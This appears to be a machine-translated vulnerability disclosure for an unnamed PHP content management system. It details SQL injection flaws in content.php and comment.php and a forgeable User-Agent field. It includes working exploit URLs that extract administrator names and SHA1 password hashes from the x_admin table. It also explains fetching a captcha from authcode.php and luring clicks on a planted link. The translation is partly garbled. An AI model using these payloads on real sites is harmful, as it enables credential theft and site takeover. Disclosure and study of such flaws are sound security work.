There is no technical error in the article! I read this program because I used to use this program to demonstrate what kind of digging holes and popularize it on Tusi. But I didn't find any vulnerability at the time. I simply looked at three places. problem, one is content. PHP file injection, and comment. php injection .. it seems that there is also a counterfeit agent injection during background login. If you are not interested, you can check it yourself.
1. content. php blind injection (chicken ribs ):
Row 3:
There is no filtering here, and I don't know how to use it. It's also a little troublesome. Post The article first (You must register a member)
Then, directly change the name of the original password form to content_link [x].
Then directly submit 1', (select 1234567890) #/* gpc can ignore why */
Then insert will close the merging:
Insert into 'x _ content_link '('link _ url', 'content _ id') values ('1', (select 1234567890) #', '22 ′)
However, after being inserted to the database, the echo is not found for a long time. I don't know what to use, so the injection is very weak, and you must have the publishing permission, so... Ignore it ~~
2. comment. php injection (seckilling)
27 rows:
There are also two problems here. One is that the comment_content comment may be complete by the author, so only one trim is used to remove the first and end blank and no other filters ~~ Www.2cto.com
Then, $ _ SERVER ['HTTP _ USER_AGENT '] is assigned to comment_agent, which can be forged ~~~
So... There are actually two injections, but considering that $ _ SERVER ['HTTP _ USER_AGENT '] still needs to be forged, We will directly demonstrate the injection at comment_content ~~
Because the system's built-in ajax comments are filtered out by single quotes in the article, you can get them directly. However, the program uses the check_request () function for verification.
Therefore, you cannot enter the file in the browser to get it. Post exp first:
Comment. php? Action = content_comment_insert & content_id = [ID] & comment_authcode = [Verification Code] & comment_content = 3', (select + concat (0x5E24, admin_name, 0x3A, admin_password, 0x245E) + from + [Table name] + limit + 0, 1), ", '1', '[ID]',", ") % 23
The Document ID used for testing is 17, and the management table name is x_admin. The x _ prefix is the default ~ Other versions are unclear... So construct exp as follows:
Comment. php? Action = content_comment_insert & content_id = 17 & comment_authcode = cdd & comment_content = 3', (select + concat (0x5E24, admin_name, 0x3A, admin_password, 0x245E) + from + x_admin + limit + 0, 1), ", '1', '17',", ") % 23
Here, comment_authcode = cdd is the verification code. You can obtain the authentication code to access the authcode. php file. If the verification code is abc, change it to comment_authcode = abc.
Then you can find a connection on the homepage, change herf to the above exp, and click the link to get it ~~~
Go to this file page to view comments... Account Password burst (note: the password is sha1 encrypted)
Original: Http://madman.in/madman5/492.htm vulnerability Author: B1oods vulnerability Source: French Forum